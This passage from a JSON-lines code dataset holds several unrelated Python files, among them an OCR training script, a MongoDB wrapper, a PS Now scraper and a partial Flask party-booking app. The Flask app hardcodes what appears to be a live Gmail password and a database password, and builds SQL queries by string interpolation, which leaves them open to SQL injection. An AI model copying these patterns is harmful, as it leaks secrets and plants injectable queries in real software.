FUNCTION\n\"\"\"\n\n\ndef center_window_tk(app_width, app_height, root):\n screen_width = root.winfo_screenwidth()\n screen_height = root.winfo_screenheight()\n x = (screen_width / 2) - (app_width / 2)\n y = (screen_height / 2) - (app_height / 2)\n root.geometry(f\"{app_width}x{app_height}+{int(x)}+{int(y)}\")\n\n\n\"\"\"\nGET GEY FROM VALUE IN DICTIONARY FUNCTION\n\"\"\"\n\n\ndef get_key_from_value(value, dictionary: dict):\n k = [k for k, v in dictionary.items() if v == value]\n if k:\n return k[0]\n else:\n return None\n\n\n\"\"\"\nPLAY GIF ANIMATION IN TKINTER APP FUNCTION\n\"\"\"\n\n\ndef play_gif(root, lbl, img):\n\n gif_file = Image.open(img)\n\n gif_frames = [\n (gif_file.seek(i), gif_file.copy())[1] for i in range(gif_file.n_frames)\n ]\n\n frame_delay = gif_file.info[\"duration\"]\n\n counts_of_frames = len(gif_frames)\n\n frame_count = 0\n\n current_frame = gif_frames[frame_count]\n\n def wrapper():\n nonlocal frame_count, current_frame, counts_of_frames, gif_frames, frame_delay\n\n if frame_count >= counts_of_frames:\n frame_count = 0\n wrapper()\n\n else:\n current_frame = ImageTk.PhotoImage(gif_frames[frame_count])\n lbl.config(image=current_frame)\n frame_count += 1\n\n root.after(frame_delay, wrapper)\n\n wrapper()\n\n\n\"\"\"\nCREATE STYLE FOR DIFFERENT TABS AND FUNCTION TO CHANGE STYLE\n\"\"\"\n\ntabs_color_list = (\"#7fcbff\", \"white\", \"black\", \"#65da65\", \"#ffe3af\", \"#a2a2a2\")\n\n\nclass TabsStyle:\n def __init__(self):\n self.style_sets = {\n 0: \"GuessNumber\",\n 1: \"Hangman\",\n 2: \"Ball8\",\n 3: \"PassworGeneration\",\n 4: \"CaesarCipher\",\n 5: \"NumberConverter\",\n }\n\n self.style = Style()\n\n for i in range(len(tabs_color_list)):\n self.style.theme_create(\n self.style_sets[i],\n parent=\"alt\",\n settings={\n \"TCombobox\": {\n \"configure\": {\n \"selectbackground\": \"#28a428\",\n \"fieldbackground\": \"#32cd32\",\n \"background\": \"#32cd32\",\n \"bordercolor\": \"#32cd32\",\n \"foreground\": \"#253529\",\n \"arrowsize\": 15,\n \"arrowcolor\": \"#253529\",\n }\n },\n \"TNotebook\": {\"configure\": {\"tabmargins\": [6, 5, 2, 0]}},\n \"TNotebook.Tab\": {\n \"configure\": {\"padding\": [8, 5], \"background\": \"#f0f8ff\"},\n \"map\": {\n \"background\": [(\"selected\", tabs_color_list[i])],\n \"foreground\": [\n (\"selected\", f\"{'white' if i == 2 else 'black'}\")\n ],\n \"expand\": [(\"selected\", [3, 3, 3, 3])],\n },\n },\n },\n )\n\n def change_style(self, idx):\n self.style.theme_use(self.style_sets[idx])\n\n\n\"\"\"\nAPP FOR CHOOSING FONT STYLE TO TAB, PROCESSING IMGS FOR APP\n\"\"\"\n\nif __name__ == \"__main__\":\n\n # MAKE APP FOR CHOOSING font for OUR app\n font_look_window = tk.Tk()\n font_look_window.geometry(\"480x480\")\n frame = tk.Frame(font_look_window, width=800, height=275)\n frame.pack()\n frame.grid_propagate(0)\n frame.columnconfigure(0, weight=15)\n our_text = font.Font(family=\"Arial\", size=25)\n\n def change_font(e):\n our_text.config(family=list_lbl.get(list_lbl.curselection()))\n\n text_lbl = tk.Text(frame, font=our_text)\n text_lbl.grid(row=0, column=0)\n text_lbl.rowconfigure(0, weight=1)\n text_lbl.columnconfigure(0, weight=1)\n\n list_lbl = tk.Listbox(font_look_window, selectmode=\"single\", width=100)\n list_lbl.pack()\n\n for f in font.families():\n list_lbl.insert(tk.END, f)\n\n list_lbl.bind(\"<ButtonRelease-1>\", change_font)\n\n font_look_window.mainloop()\n\n \"\"\"CONVERT IMAGE AND CREATE NEGATIVE IMG FOR APP\"\"\"\n # image = Image.open('imgs\\\\NicePng_back-button-png_876153.png')\n # new_image = image.resize((50, 52))\n # new_image.save('imgs\\\\back_btn.png')\n\n # # create negative\n # img = Image.open(r'imgs\\question_btn.png')\n # neg = ImageOps.invert(img.convert('RGB'))\n # neg.save('imgs\\\\negativ.png')\n", "repo_name": "Egor-Kotov/Study", "sub_path": "Projects/PythonGeneration_ForBeginners._MiniProjects/functions_and_style.py", "file_name": "functions_and_style.py", "file_ext": "py", "file_size_in_byte": 4594, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "PIL.Image.open", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 39, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 61, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 61, "usage_type": "name"}, {"api_name": "tkinter.ttk.Style", "line_number": 88, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 131, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 133, "usage_type": "call"}, {"api_name": "tkinter.font.Font", "line_number": 137, "usage_type": "call"}, {"api_name": "tkinter.font", "line_number": 137, "usage_type": "name"}, {"api_name": "tkinter.Text", "line_number": 142, "usage_type": "call"}, {"api_name": "tkinter.Listbox", "line_number": 147, "usage_type": "call"}, {"api_name": "tkinter.font.families", "line_number": 150, "usage_type": "call"}, {"api_name": "tkinter.font", "line_number": 150, "usage_type": "name"}, {"api_name": "tkinter.END", "line_number": 151, "usage_type": "attribute"}]} +{"seq_id": "16728195107", "text": "import os\nimport sys\nimport numpy as np\n\nfrom sklearn.model_selection import train_test_split\nimport pandas as pd\n\nfrom warpctc_pytorch import CTCLoss\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.utils.data import DataLoader\nimport torch.functional as F\nfrom torch.autograd import Variable as V\nfrom torchvision import transforms\n\nfrom helpers import Converter, Resize, ToTensorTarget, NormalizeTarget, Sharpnes, Blur, Affine, Mono\nfrom models import crnn, densenet\nfrom configs import generator_cfg, trainer_cfg\nfrom datareader import DataStream\n\nt_cfg = trainer_cfg()\ng_cfg = generator_cfg()\n\ndef _acc(preds, labels, lengths, total_size, converter):\n acc = 0\n preds = converter.decode_probs(preds)\n labels = converter.decode(labels, lengths)\n for pred, label in zip(preds, labels):\n if pred.lower() == label.lower():\n acc += 1\n ret = acc / total_size\n return ret\n\n\ndef main():\n global t_cfg\n global g_cfg\n print(g_cfg.alph)\n transform = transforms.Compose([Resize((128, 32)), Affine(),\n ToTensorTarget()])\n # NormalizeTarget([0.485, 0.456, 0.406],\n # [0.229, 0.224, 0.225])])\n\n # data preparation\n # create one fold split with 1/5 ration for validation\n data = pd.read_csv(t_cfg.DATANAME, sep=';', header=None)\n train_data, valid_data = train_test_split(data, test_size=.2, random_state=111)\n\n # train_data.to_csv('./train_data.csv')\n # valid_data.to_csv('./valid_data.csv')\n\n # define data flow for train and valid\n tds = DataStream(train_data, transform=transform)\n tdl = DataLoader(tds, batch_size=t_cfg.bs, shuffle=True, num_workers=23)\n vds = DataStream(valid_data, transform=transform)\n vdl = DataLoader(vds, batch_size=t_cfg.bs, shuffle=True, num_workers=23)\n converter = Converter(g_cfg.alph, ignore_case=False)\n\n # model/criterion define and optimizator selection\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = crnn.CRNN(3, len(g_cfg.alph) + 1, 256).to(device)\n # model = densenet.DenseNet(num_classes=len(g_cfg.alph)+1).to(device)\n # criterion = nn.CTCLoss()\n criterion = CTCLoss()\n optimizer = optim.Adam(model.parameters(),\n lr=t_cfg.lr,\n weight_decay=t_cfg.wl2,\n )\n # lr_sched = optim.lr_scheduler.ReduceLROnPlateau(optimizer, 'min')\n # lr_sched = optim.lr_scheduler.MultiStepLR(optimizer, milestones=[15,20],gamma=0.05)\n lr_sched = optim.lr_scheduler.ExponentialLR(optimizer, gamma=0.95)\n\n for epoch in range(t_cfg.epochs):\n loss, acc = do_epoch(tdl,\n model,\n optimizer,\n criterion,\n lr_sched,\n device,\n converter,\n mode='train',\n )\n print()\n if epoch > t_cfg.pivot:\n if loss < t_cfg.valid_loss:\n t_cfg.valid_loss = loss\n acc = do_epoch(vdl,\n model,\n optimizer,\n criterion,\n lr_sched,\n device,\n converter,\n mode='valid',\n )\n torch.save(model, './model.pt')\n print('Validation acc: %.5f' % acc)\n lr_sched.step()\n print('Finished epoch: %d' % epoch, 'Loss: %.8f' % loss,\n 'Acc: %.3f\\n' % acc)\n\ndef do_epoch(dl,\n model,\n optimizer,\n criterion,\n lr_sched,\n device,\n converter,\n mode='train',\n ):\n global t_cfg\n global g_cfg\n L = []\n A = []\n if mode == 'train':\n model.train()\n # handle smaller batch\n try:\n for idx, sample in enumerate(dl):\n X = V(sample['img'].to(device))\n Y, Y_lengths = converter.encode(sample['label'])\n # Y = Y.to(device)\n\n optimizer.zero_grad()\n\n y_hat = model(X)\n\n preds_size = torch.IntTensor(t_cfg.bs).fill_(y_hat.shape[0])\n loss = criterion(y_hat, Y, preds_size, Y_lengths) / Y.size()[0]\n loss.backward()\n torch.nn.utils.clip_grad_norm(model.parameters(), 5)\n optimizer.step()\n\n l = loss.detach().cpu().numpy()\n\n L.append(l)\n\n # acc = _acc(y_hat, Y, Y_lengths, t_cfg.bs, converter)\n acc = 0\n A.append(acc)\n\n print('\\r', 'Train step: %d' % (idx+1), '|', len(dl),\n 'Loss %.8f' % np.mean(L), end=' ')\n except:\n print('--')\n return np.mean(L), np.mean(A)\n\n elif mode == 'valid':\n with torch.no_grad():\n for idx, sample in enumerate(dl):\n X = V(sample['img'].to(device))\n Y, Y_lengths = converter.encode(sample['label'])\n # Y = Y.to(device)\n y_hat = model(X)\n\n preds_size = torch.IntTensor(t_cfg.bs).fill_(y_hat.shape[0])\n acc = _acc(y_hat, Y, Y_lengths, t_cfg.bs, converter)\n A.append(acc)\n\n print('\\r', 'Val step: %d' % (idx + 1), '|', len(dl),\n 'Acc: %.5f' % acc, end=' ')\n return np.mean(A)\n\nif __name__ == '__main__':\n main()\n", "repo_name": "frmsvrt/OCR", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 5590, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "configs.trainer_cfg", "line_number": 23, "usage_type": "call"}, {"api_name": "configs.generator_cfg", "line_number": 24, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 41, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 41, "usage_type": "name"}, {"api_name": "helpers.Resize", "line_number": 41, "usage_type": "call"}, {"api_name": "helpers.Affine", "line_number": 41, "usage_type": "call"}, {"api_name": "helpers.ToTensorTarget", "line_number": 42, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 48, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 49, "usage_type": "call"}, {"api_name": "datareader.DataStream", "line_number": 55, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 56, "usage_type": "call"}, {"api_name": "datareader.DataStream", "line_number": 57, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 58, "usage_type": "call"}, {"api_name": "helpers.Converter", "line_number": 59, "usage_type": "call"}, {"api_name": "torch.device", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 62, "usage_type": "attribute"}, {"api_name": "models.crnn.CRNN", "line_number": 63, "usage_type": "call"}, {"api_name": "models.crnn", "line_number": 63, "usage_type": "name"}, {"api_name": "warpctc_pytorch.CTCLoss", "line_number": 66, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 67, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 67, "usage_type": "name"}, {"api_name": "torch.optim.lr_scheduler.ExponentialLR", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.optim.lr_scheduler", "line_number": 73, "usage_type": "attribute"}, {"api_name": "torch.optim", "line_number": 73, "usage_type": "name"}, {"api_name": "torch.save", "line_number": 98, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 122, "usage_type": "call"}, {"api_name": "torch.IntTensor", "line_number": 130, "usage_type": "call"}, {"api_name": "torch.nn.utils.clip_grad_norm", "line_number": 133, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 133, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 145, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 148, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 151, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 153, "usage_type": "call"}, {"api_name": "torch.IntTensor", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 164, "usage_type": "call"}]} +{"seq_id": "4293661879", "text": "from django.conf.urls import url\n\nfrom fyt.emails.views import (\n Applicants,\n IncomingStudents,\n LeadersBySection,\n LeadersByTripType,\n Trippees,\n TrippeesByTripType,\n)\n\n\nurlpatterns = [\n url(r'^applicants/$', Applicants.as_view(), name='applicants'),\n url(\n r'^leaders/by-triptype/$',\n LeadersByTripType.as_view(),\n name='leaders_by_triptype',\n ),\n url(\n r'^leaders/by-section/$', LeadersBySection.as_view(), name='leaders_by_section'\n ),\n url(r'^incoming/$', IncomingStudents.as_view(), name='incoming'),\n url(r'^trippees/$', Trippees.as_view(), name='trippees'),\n url(\n r'^trippees/by-triptype/$',\n TrippeesByTripType.as_view(),\n name='trippees_by_triptype',\n ),\n\n]\n", "repo_name": "rlmv/doc-trips", "sub_path": "fyt/emails/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 764, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "86", "api": [{"api_name": "django.conf.urls.url", "line_number": 14, "usage_type": "call"}, {"api_name": "fyt.emails.views.Applicants.as_view", "line_number": 14, "usage_type": "call"}, {"api_name": "fyt.emails.views.Applicants", "line_number": 14, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 15, "usage_type": "call"}, {"api_name": "fyt.emails.views.LeadersByTripType.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "fyt.emails.views.LeadersByTripType", "line_number": 17, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 20, "usage_type": "call"}, {"api_name": "fyt.emails.views.LeadersBySection.as_view", "line_number": 21, "usage_type": "call"}, {"api_name": "fyt.emails.views.LeadersBySection", "line_number": 21, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 23, "usage_type": "call"}, {"api_name": "fyt.emails.views.IncomingStudents.as_view", "line_number": 23, "usage_type": "call"}, {"api_name": "fyt.emails.views.IncomingStudents", "line_number": 23, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 24, "usage_type": "call"}, {"api_name": "fyt.emails.views.Trippees.as_view", "line_number": 24, "usage_type": "call"}, {"api_name": "fyt.emails.views.Trippees", "line_number": 24, "usage_type": "name"}, {"api_name": "django.conf.urls.url", "line_number": 25, "usage_type": "call"}, {"api_name": "fyt.emails.views.TrippeesByTripType.as_view", "line_number": 27, "usage_type": "call"}, {"api_name": "fyt.emails.views.TrippeesByTripType", "line_number": 27, "usage_type": "name"}]} +{"seq_id": "22034682722", "text": "from pymongo import MongoClient, ASCENDING\n\nfrom dicetables_db.connections.baseconnection import BaseConnection\n\n\nclass MongoDBConnection(BaseConnection):\n def __init__(self, db_name: str, collection_name: str, ip='localhost', port=27017):\n self._client = MongoClient(ip, port)\n self._db = self._client[db_name]\n self._collection = self._db[collection_name]\n self._params_storage = (db_name, collection_name, ip, str(port))\n self._place_holder = None\n\n def is_collection_empty(self):\n return not self._collection.count()\n\n def get_info(self):\n indices = self._get_indices()\n info = {\n 'db': self._db.name,\n 'collections': self._db.collection_names(),\n 'current_collection': self._collection.name,\n 'indices': indices,\n 'ip': self._params_storage[2],\n 'port': self._params_storage[3]\n }\n return info\n\n def _get_indices(self):\n out = []\n if self._collection.name in self._db.collection_names():\n index_info = self._collection.index_information()\n use_keys = [key for key in self._collection.index_information() if key != '_id_']\n for key in use_keys:\n columns = [pair[0] for pair in index_info[key]['key']]\n out.append(tuple(columns))\n out.sort()\n return out\n\n def reset_collection(self):\n self.drop_collection()\n\n def drop_collection(self):\n self._db.drop_collection(self._collection.name)\n\n def close(self):\n if self._client:\n self._client.close()\n self._client = None\n self._collection = None\n self._db = None\n\n def find(self, params_dict=None, projection=None):\n \"\"\"\n\n :return: iterable of results\n \"\"\"\n new_params, new_projection = self._prep_find_inputs(params_dict, projection)\n results = self._collection.find(new_params, new_projection)\n return [self._result_with_new_id(result) for result in results]\n\n def find_one(self, params_dict=None, projection=None):\n new_params, new_projection = self._prep_find_inputs(params_dict, projection)\n result = self._collection.find_one(new_params, new_projection)\n return self._result_with_new_id(result)\n\n def _prep_find_inputs(self, params_dict, projection):\n new_params = self._params_with_new_id(params_dict)\n self._raise_error_for_bad_projection(projection)\n new_projection = self._make_consistent_projection_api(projection)\n return new_params, new_projection\n\n def _params_with_new_id(self, params):\n convert_method = self.id_class().to_bson_id\n return self._dict_with_new_id(convert_method, params)\n\n def _result_with_new_id(self, result):\n convert_method = self.id_class().from_bson_id\n return self._dict_with_new_id(convert_method, result)\n\n @staticmethod\n def _dict_with_new_id(convert_method, input_dict):\n if input_dict is None:\n return None\n return {key: convert_method(val) if key == '_id' else val for key, val in input_dict.items()}\n\n @staticmethod\n def _raise_error_for_bad_projection(projection):\n if projection:\n bool_values = [bool(value) for value in projection.values()]\n if True in bool_values and False in bool_values:\n raise ValueError('Projection cannot have a mix of inclusion and exclusion.')\n\n @staticmethod\n def _make_consistent_projection_api(projection):\n if not projection:\n return None\n new_projection = {key: bool(value) for key, value in projection.items()}\n if True in new_projection.values():\n if '_id' not in new_projection.keys():\n new_projection['_id'] = False\n return new_projection\n\n def insert(self, document):\n \"\"\"\n\n :return: ObjectId\n \"\"\"\n to_insert = document.copy()\n obj_id = self._collection.insert_one(to_insert).inserted_id\n return self.id_class().from_bson_id(obj_id)\n\n def create_index(self, column_tuple):\n params = [(column_name, ASCENDING) for column_name in column_tuple]\n self._collection.create_index(params)\n\n def has_index(self, columns_tuple):\n indices = self.get_info()['indices']\n return columns_tuple in indices\n\n", "repo_name": "eric-s-s/dicetables_db", "sub_path": "dicetables_db/connections/mongodb_connection.py", "file_name": "mongodb_connection.py", "file_ext": "py", "file_size_in_byte": 4396, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "dicetables_db.connections.baseconnection.BaseConnection", "line_number": 6, "usage_type": "name"}, {"api_name": "pymongo.MongoClient", "line_number": 8, "usage_type": "call"}, {"api_name": "pymongo.ASCENDING", "line_number": 114, "usage_type": "name"}]} +{"seq_id": "9187465958", "text": "import ujson as json\nimport os\n\n\nclass Storage:\n\n def __init__(self, kernel, file, defaults={}):\n self.kernel = kernel\n self._file = file\n self._data = defaults\n try:\n with open(self._file, 'r') as f:\n data = json.load(f)\n if not isinstance(data, dict):\n raise ValueError(\"Only dicts can be loaded\")\n self._data.update(data)\n except:\n pass\n self._data.setdefault('_settings', {})\n\n def update(self):\n result = self.kernel.http.post('/settings/update')\n import gc\n gc.collect()\n if result is None:\n return False\n if result.status_code is not 200:\n return False\n json = result.json()\n if type(json) is not dict:\n return False\n json = json['response']\n if type(json) is not dict:\n return False\n name = json.get('name', None)\n if name:\n self._data['NAME'] = name\n image = json.get('image', None)\n if image:\n self._data['IMAGE'] = image\n schedule = json.get('schedule', None)\n if schedule:\n self._data['SCHEDULE'] = schedule\n settings = json.get('settings', {})\n for k, v in [(key, settings[key]) for key in settings.keys()]:\n self._data['_settings'][k] = v\n self._save()\n return True\n\n def _save(self, remote=True):\n with open(self._file, 'w') as f:\n json.dump(self._data, f)\n\n def __getattr__(self, item):\n return self._data.get(item, None)\n\n def __getitem__(self, item):\n return self._data.get(item, None)\n\n def __setitem__(self, key, value):\n self._data[key] = value\n self._save()\n\n def get(self, item, default=None):\n if not item.startswith(self.kernel.app + '.'):\n return default\n return self._data['_settings'].get(item, default)\n\n def set(self, key, value):\n result = self.kernel.http.post('/settings/set', json={key: value})\n if result is not None and result.status_code is 204:\n self._data['_settings'][key] = value\n\n def sync(self):\n if self.kernel.ensure_registration() > 0:\n return\n result = self.kernel.http.post('/name', json={'name': self.NAME})\n\n def wipe(self):\n try:\n os.remove(self._file)\n except:\n pass\n\n\n\n\n", "repo_name": "ernw/tr19-badge-firmware", "sub_path": "ports/esp32/modules/system/storage.py", "file_name": "storage.py", "file_ext": "py", "file_size_in_byte": 2459, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "86", "api": [{"api_name": "ujson.load", "line_number": 13, "usage_type": "call"}, {"api_name": "gc.collect", "line_number": 24, "usage_type": "call"}, {"api_name": "ujson.get", "line_number": 35, "usage_type": "call"}, {"api_name": "ujson.get", "line_number": 38, "usage_type": "call"}, {"api_name": "ujson.get", "line_number": 41, "usage_type": "call"}, {"api_name": "ujson.get", "line_number": 44, "usage_type": "call"}, {"api_name": "ujson.dump", "line_number": 52, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 81, "usage_type": "call"}]} +{"seq_id": "35100526416", "text": "import requests\nimport json\nimport html\nfrom html2json import collect\nfrom bs4 import BeautifulSoup\nfrom bs2json import bs2json\nimport csv\nimport ast\nimport time\n\nwith open('psnowgamelist.csv', mode='w', encoding=\"utf-8\", newline='') as gamelist_file:\n fieldname = ['Game', 'Console', 'Until']\n gamelist = csv.DictWriter(gamelist_file, fieldnames=fieldname)\n gamelist.writeheader()\n url = \"https://psvrtrophy.software.eu.playstation.com/ps-now/data_sync\"\n\n headers = {\n 'Connection': 'keep-alive',\n 'Accept': 'application/json, text/javascript, */*; q=0.01',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36',\n 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',\n# 'Origin': 'https://www.playstation.com',\n# 'Sec-Fetch-Site': 'same-site',\n# 'Sec-Fetch-Mode': 'cors',\n# 'Sec-Fetch-Dest': 'empty',\n# 'Referer': 'https://www.playstation.com/de-de/explore/playstation-now/playstation-now-spiele-katalog/',\n# 'Accept-Language': 'de-DE,de;q=0.9,ja-JP;q=0.8,ja;q=0.7,en-US;q=0.6,en;q=0.5,fr;q=0.4'\n }\n for i in range(0,99):\n payload = \"genre=&platform=&sorting=alphabetical&search=&ajax_action=filter_games&page_num=\" + str(i)\n try:\n response = requests.request(\"POST\", url, headers=headers, data = payload)\n except requests.exceptions.RequestException as e: # This is the correct syntax\n raise SystemExit(e)\n games = json.loads(response.text)\n if games['action_queue'][0][1]:\n games = games['action_queue'][0][1]['value']\n converter = bs2json()\n soup = BeautifulSoup(games, \"lxml\")\n\n for j in soup.findAll('div', class_=\"cc_psnow_game_item\"):\n for s in j.findAll('h3'):\n m = s.extract()\n extracter = converter.convert(m)\n gametitle = extracter['h3']['text']\n if j.find('img', alt=\"PS3\"):\n console = \"PS3\"\n elif j.find('img', alt=\"PS4\"):\n console = \"PS4\"\n elif j.find('img', alt=\"PS2\"):\n console = \"PS2\"\n print(gametitle+console)\n gamelist.writerow({'Game': gametitle,'Console': console, 'Until': 'TBD'})\n", "repo_name": "aickletfraid/PSNowGames", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2379, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "86", "api": [{"api_name": "csv.DictWriter", "line_number": 13, "usage_type": "call"}, {"api_name": "requests.request", "line_number": 32, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 33, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 35, "usage_type": "call"}, {"api_name": "bs2json.bs2json", "line_number": 38, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "22226630431", "text": "\nfrom flask import Flask, session, Markup, Response\nfrom flask import request, render_template, url_for, redirect, flash, send_file\nfrom flask_mail import Mail, Message\nfrom datetime import datetime\nfrom passlib.hash import sha256_crypt\nimport warnings\n\nfrom dbconnect import connection\nfrom functools import wraps\nfrom werkzeug.utils import secure_filename\nimport os\nfrom flask import send_from_directory\nimport random\n\nimport math\n\nfrom autualizador import InsertSql, UpdateQuerySql, SelectSql, eventos\n\n\n\nmes = str(datetime.now().strftime(\"%b\"))\ndia = str(datetime.now().strftime(\"%d\"))\nhora = str(datetime.now().strftime(\"%H:%M:%S\"))\n\nnum_Os = []\nuser_online = []\napp = Flask(__name__)\n\nmail_settings = {\n 'MAIL_SERVER': 'smtp.gmail.com',\n 'MAIL_PORT': 465,\n 'MAIL_USE_TLS':False,\n 'MAIL_USE_SSL': True,\n 'MAIL_USERNAME':'rafael.figueiradafoz@gmail.com',\n 'MAIL_PASSWORD': 'ttvjkembddcfqjxs'\n\n}\n\napp.config.update(mail_settings)\n\nmail = Mail(app)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:rootpass@localhost/festa_facil'\n\nUPLOAD_FOLDER = './static/uploads/'\nALLOWED_EXTENSIONS = {'txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'}\napp.config['WTF_CSRF_ENABLED'] = True\napp.config['SECRET_KEY']='my_love_dont_try'\n\n\n############ METODOS APLICADOS ####################\n\ndef allowed_file(filename):\n return '.' in filename and \\\n filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\n\n#\n# def invoice(f):\n# @wraps(f)\n# def wrap(*args, **kwargs):\n# if 'invoice' in session:\n# return f(*args, **kwargs)\n# else:\n# flash(\"Nao possui nenhum pedido\")\n# return redirect(url_for('dashboard'))\n# return wrap\n#\n#\n\n\n\n\n\n\n\n\ndef login_required(f):\n @wraps(f)\n def wrap(*args, **kwargs):\n if 'logged_in' in session:\n return f(*args, **kwargs)\n else:\n flash(\"Precisa fazer o Login\")\n return redirect(url_for('index'))\n return wrap\n\n\n\n\n############ METODOS APLICADOS ####################\n\n\n\n\ndef check_user_Login(login):\n try:\n c,conn = connection()\n x = c.execute(f\"\"\"SELECT * FROM usuarios WHERE LOGIN={login}\"\"\")\n if int(x) > 0:\n myresult = c.fetchall()\n return myresult\n if int(x) == 0:\n return False\n except Exception as e:\n print(f' ERROR: {str(e)}')\n return (str(e))\ndef check_user_ID(id):\n try:\n c,conn = connection()\n x = c.execute(f\"\"\"SELECT * FROM usuarios WHERE id_usuario={id}\"\"\")\n if int(x) > 0:\n myresult = c.fetchall()\n return myresult\n if int(x) == 0:\n return False\n except Exception as e:\n print(f' ERROR: {str(e)}')\n return (str(e))\n\n\ndef generateOTP():\n # Declare a string variable\n # which stores all string\n string = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'\n OTP = \"\"\n length = len(string)\n for i in range(6):\n OTP += string[math.floor(random.random() * length)]\n return OTP\n\n\n\ndef ADD_pontos(pontos, id):\n user = SelectSql('usuarios','id_usuarios',id)\n for x in user:\n add = int(x[6]) + int(pontos)\n UpdateQuerySql({'PONTOS':add},'usuarios','id_usuarios',id)\n\n\n\n############ INDEX ####################\n\n@app.route('/', methods=['GET', 'POST'])\ndef index():\n try:\n festas = SelectSql('eventos','STATUS', 'OK')\n links = SelectSql('instagram','STATUS', 'OK')\n print(festas)\n\n return render_template('index.html', festas=festas, links=links)\n except Exception as e:\n print(f' ERROR: {str(e)}')\n return (str(e))\n\n\n\n\n\n# ############ ROTAS DIRETAS ####################\n@app.route('/logout/', methods=['GET', 'POST'])\n@login_required\ndef logout():\n session.clear()\n flash('Voce esta saindo do APP! Obrigado','logout')\n return redirect(url_for('index'))\n@app.errorhandler(404)\ndef pag_not_found(e):\n return render_template(\"404.html\")\n\n\n ##### DASHBOARD #####\n@app.route('/dashboard/', methods=['GET', 'POST'])\n@login_required\n\ndef dashboard():\n delyvery_list = []\n realizado_list = []\n id = session['ID_User']\n user = SelectSql('usuarios', 'id_usuarios',id)\n pedidos = SelectSql('invoice', 'id_usuarios',id)\n for p in pedidos:\n status = p[5]\n\n if status == 'A ENTREGAR':\n delyvery_list.append(status)\n if status == 'REALIZADO':\n realizado_list.append(status)\n\n\n to_delivery = len(delyvery_list)\n realizados = len(realizado_list)\n n_pedidos = len(pedidos)\n # print(to_delivery)\n\n\n return render_template('dashboard.html', user=user[0], pontos=user[0][6],\n invoice = pedidos, pop_pedidos= n_pedidos,\n to_delivery=to_delivery, realizados=realizados)\n\n\n\n\n# @app.route('/page_forgot_password', methods=['GET', 'POST'])\n# def email_forgot():\n# return render_template('redirect.html')\n\n\n@app.route('/pedidos_promo', methods=['GET', 'POST'])\ndef pedidos_promo():\n\n return render_template('pedidos_promo.html')\n\n\n@app.route('/transfer/<filename>', methods=['GET', 'POST'])\ndef uploaded_file(filename):\n if filename == None:\n filename = 'teste'\n return send_from_directory(app.config['UPLOAD_FOLDER'],\n filename)\n\n\n\n\n############ ROTAS LOGIN / DASHBOARD ####################\n\n\n@app.route('/login/', methods=['GET', 'POST'])\ndef login():\n error = ''\n try:\n if request.method == 'POST':\n\n if request.form['POP_UP'] == 'pedidos_promo':\n email = request.form['EMAIL']\n password = request.form['PASSWORD']\n check_user = SelectSql('usuarios', 'LOGIN', email)\n page_url = request.form['POP_UP']\n\n if check_user == False:\n flash(\"Login ou Senha Errada, confira e tenta novamente\", 'erro')\n\n return redirect(url_for(page_url))\n else:\n for person in check_user:\n id = person[0]\n check_password = person[4]\n nome = 